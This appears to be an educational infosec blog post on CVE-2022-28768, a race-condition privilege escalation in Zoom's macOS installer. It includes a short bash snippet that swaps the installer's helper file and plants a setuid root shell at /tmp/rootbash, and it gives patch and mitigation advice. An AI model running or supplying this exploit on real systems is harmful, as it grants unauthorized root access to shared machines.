Disclaimer: This post is for educational and awareness purposes only. Do not use any information here for malicious activities.
What is CVE-2022-28768?
In 2022, a serious security flaw with the Zoom Client for Meetings Installer for macOS was patched. This vulnerability—CVE-2022-28768—let a regular user get full "root" control of a Mac just by timing things right during Zoom’s installation or upgrade. This issue affected:
Before version 5.12.6 (so, anything older than that).
If your system was running an old Zoom installer, a local unprivileged user could sneak in and upgrade themselves to a root user.
The Vulnerability in Simple Terms
Zoom’s installer runs with root privileges (it needs to do things like put files in special system folders). The installer uses a tool called zoomAutenticationTool that gets called during setup.
The problem: The installer let anyone running code on the Mac replace this helper tool with their own program before the installer finished running! So if an attacker *timed it right*, they could sneak in their own "malicious ZoomAuth" that would be run by the installer as root.
When the installer calls the helper script, it runs the attacker's code *as root*!
The original helper had permission settings that let non-root users swap in a malicious helper. This is a classic example of a race condition and improper file permissions.
Exploit Demonstration (Code Snippet)
Again, this is for education/awareness only. Here’s a simplified version that shows what an attacker might do during installation. Assume the installer leaves its helper at:
/private/tmp/zoomAuthenticationTool
Bash Snippet: Overwrite Helper
# Wait for the installer to drop the helper
while [ ! -f /private/tmp/zoomAuthenticationTool ]; do
sleep .1
done
# Overwrite with malicious script
cat > /private/tmp/zoomAuthenticationTool <<'EOF'
#!/bin/bash
# Malicious code – for example, create a root shell
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
EOF
# Make it executable
chmod +x /private/tmp/zoomAuthenticationTool
What happens?
When the Zoom installer runs the helper, it runs as root and gives the attacker a root shell at /tmp/rootbash.
Low-privileged users can't do many things, but they can install Zoom updates.
- A user (or malware acting as them) waits for an IT admin or automated system to run the Zoom installer.
- With a simple script in the background, the user keeps checking for the helper file, swaps in their own, and gains root privileges the moment Zoom finishes installing.
Temporary files should be in strictly protected locations with correct permissions.
- Race conditions—where two processes compete to use or replace a file—can cause big security headaches.
Zoom patched this issue in version 5.12.6 (released October 2022).
Now, the helper’s permissions and location are properly secured, and unprivileged users can't clobber the root-owned binary.
If you use Zoom on a Mac, make sure you’ve updated!
- Download the latest version here: https://zoom.us/download
References
- Zoom Security Bulletin - ZSB-22030
- NVD entry: CVE-2022-28768
- GitHub: Write-up “Zoom Zero-Day: The 2nd Install” by Patrick Wardle
Always keep major apps up-to-date—especially those that run as root during install!
- For developers: Always watch out for race conditions and ensure your app’s installer uses secure permissions.
Final Thoughts
Local privilege escalation bugs like CVE-2022-28768 are particularly dangerous on shared computers and enterprise environments. While they require local access, they can easily become stepping stones for bigger attacks. Thankfully, Zoom’s team patched this fast.
Stay secure, update often, and review your Mac’s installed apps—which ones have root-level installers?
If you want to test your own system’s security, always do so carefully, and only on systems you own.
*Did you like this post? Follow for more accessible infosec breakdowns!*
Timeline
Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 17:12:00 UTC